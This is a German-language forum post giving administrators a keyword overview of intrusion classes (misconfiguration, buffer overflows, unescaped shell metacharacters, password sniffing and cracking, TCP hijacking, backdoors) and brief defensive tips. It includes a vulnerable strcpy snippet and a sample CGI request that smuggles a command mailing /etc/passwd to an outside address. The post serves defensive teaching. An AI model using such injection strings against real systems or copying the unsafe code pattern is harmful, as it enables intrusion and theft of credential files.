Penetration -- Ein Stichwortüberblick für Administratoren

throjan

Administrator
Mitarbeiter
#1
"Wie mache ich einen Rechner im Internet auf?"
====================================

Penetrationsmöglichkeiten
-------------------------

<> Klassen von Penetrationen:
- - - - - - - - - - - - - - - - -

- Fehlkonfiguration, nicht abgeschaltete Dienste
- Die größte einzelne Ursache für Einbrüche
- Auch: Sicherheitspatches des Herstellers nicht eingespielt
- Meistens unnötige Dienste nicht abgeschaltet
- Firewall(s)- und Routerkonfigurationen fehlerhaft
- SMTP Relaying nicht abgeschaltet (Spam)
- Inhärent unsichere Dienste (NFS, NIS, telnet, rlogin)

- Buffer Overflow

void bla(char *s) { char buf[100]; strcpy(buf,s); }

- Sehr häufiger Fehler!
- Teilweise auch in Library-Funktionen ( z.B. syslog() )
- MS Exchange, wu-ftpd. Netscape, MSIE, sendmail, Outlook, Outlook Express, MS IIS, ...

- Metazeichen nicht escaped

http://www.site.com/search.cgi?what=bla;mail+/etc/passwd+me@here.com

- Wenn /bin/sh involviert ist ( system() ), müssen alle Metazeichen entfernt werden!
- Sendmail, Excite personal search extension, metamail, ...
- Whitelisten, nicht blacklisten
- Sehr viele Freeware-CGI-Perlscripte
- ::$DATA bei NT-Servern

- Passwörter gesnifft
- telnet
- Beliebte Ziele sind auch POP3 und IMAP, weil die gewöhnlich periodisch die
Paßwörter über das Netz broadcasten.

- Passwörter gecrackt
- Viele Fehler erlauben nicht, remote Code aus root auszuführen, aber man kann
damit /etc/passwd (oder die NIS-Map) lesen. Das reicht für einen Wörterbuchangriff auf die Passwort-Liste.
- Der empfohlene Password-Cracker ist "John the Ripper"

- TCP-Hijacking
Man kann auf der Route einer TCP-Verbindung die Verbindung übernehmen,
was besonders bei One-Time-Password schemas vorteilhaft benutzt werden kann, um die
authentifizierte Verbindung zu übernehmen.

- Hintertüren
In letzter Zeit sind Hintertüren vor allem bei Routern aufgetaucht, aber
historisch gibt es sie auch in Form von Trojanischen Pferden (Back Orifice, Netbus)
und von frühen Unix- und VMS-Versionen gibt es auch Anekdoten.

<> Wie schützt man sich?
- - - - - - - - - - - - -

- Nicht auf die Firewall verlassen. Hosts zusätzlich absichern.
- Verbindungen verschlüsseln, ssh einsetzen
- Ständig Scans auf die Rechner machen
- open Source hilft gegen offensichtliche Hintertüren
- Keine Microsoft-Produkte einsetzen
- Passwörter periodisch selbst zu cracken versuchen

? HaBo-Security
 
Oben